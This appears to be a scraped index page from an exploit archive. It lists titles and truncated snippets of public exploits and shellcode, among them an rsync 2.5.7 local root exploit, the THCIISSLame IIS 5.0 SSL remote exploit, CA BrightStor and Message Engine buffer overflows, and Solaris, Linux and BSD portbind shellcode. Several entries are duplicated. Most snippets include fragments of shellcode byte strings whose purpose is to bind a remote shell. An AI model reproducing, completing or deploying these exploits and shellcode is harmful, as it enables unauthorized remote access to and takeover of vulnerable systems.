rsync <= 2.5.7 - Local stack overflow Root Exploit

No description provided by source. / rsync = 2.5.7 Local Exploit Saved EIP on stack is overwritten with address of shellcode in memory Generally rsync is not setuid or setgid so just a local shell is of no use So i used a portbinding shellcode as a PoC of a different attack vector. RET is...

solaris/SPARC portbinding shellcode

No description provided by source. / Solaris - Sparc - www.dopesquad.net / char shellcode = \xa0\x23\xa0\x10 / sub %sp, 16, %l0 / \xae\x23\x80\x10 / sub %sp, %l0, %l7 / \xee\x23\xbf\xec / st %l7, %sp - 20 / \x82\x05\xe0\xd6 / add %l7, 214, %g1 / \x90\x25\xe0\x0e / sub %l7, 14, %o0 /...

Computer Associates Products Message Engine RPC Server Multiple Buffer Overflow Vulnerabilities (2)

No description provided by source. source: http://www.securityfocus.com/bid/20365/info Multiple Computer Associates products are prone to multiple buffer-overflow vulnerabilities because the applications using an affected library fail to properly bounds-check user-supplied input before copying it...

rsync &lt;= 2.5.7 Local stack overflow Root Exploit

No description provided by source. / rsync = 2.5.7 Local Exploit Saved EIP on stack is overwritten with address of shellcode in memory Generally rsync is not setuid or setgid so just a local shell is of no use So i used a portbinding shellcode as a PoC of a different attack vector. RET is...

MS Windows IIS 5.0 SSL Remote buffer overflow Exploit (MS04-011)

No description provided by source. // / THCIISSLame 0.3 - IIS 5 SSL remote root exploit / / Exploit by: Johnny Cyberpunk [email protected] / / THC PUBLIC SOURCE MATERIALS / / / / Bug was found by Intern...

CA BrightStor Backup 11.5.2.0 (Mediasvr.exe) Remote Code Exploit

Exploit for unknown platform in category remote exploits ================================================================ CA BrightStor Backup 11.5.2.0 Mediasvr.exe Remote Code Exploit ================================================================ !/usr/bin/python Computer Associates CA...

linux/x86 portbind (define your own port) 84 bytes

No description provided by source. / Shellcode - portbind 84 bytes Copyright c 2002 Giuseppe Gottardi 'oveRet' [email protected] All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:...

bsd/x86 portbind port 31337 83 bytes

No description provided by source. / portbinding execve shellcode port 31337 bsd/x86 83b - no1 greyhats.za.net / char shellc0de= "\x99" // cdq "\x52" // pushl %edx "\x6a\x01" // pushl $0x01 "\x6a\x02" // pushl $0x02 "\xb0\x61" // movb $0x61,%al "\x50" // pushl %eax "\xcd\x80" // int $0x80 "\x52" ...

bsd/x86 portbind port 31337 83 bytes

Exploit for bsd/x86 platform in category shellcode ==================================== bsd/x86 portbind port 31337 83 bytes ==================================== / portbinding execve shellcode port 31337 bsd/x86 83b - no1 greyhats.za.net / char shellc0de= "\x99" // cdq "\x52" // pushl %edx...

bsd/x86 - portbind port 31337 83 bytes

bsd/x86 portbind port 31337 83 bytes. Shellcode exploit for bsdx86 platform / portbinding execve shellcode port 31337 bsd/x86 83b - no1 greyhats.za.net / char shellc0de= "\x99" // cdq "\x52" // pushl %edx "\x6a\x01" // pushl $0x01 "\x6a\x02" // pushl $0x02 "\xb0\x61" // movb $0x61,%al "\x50" //...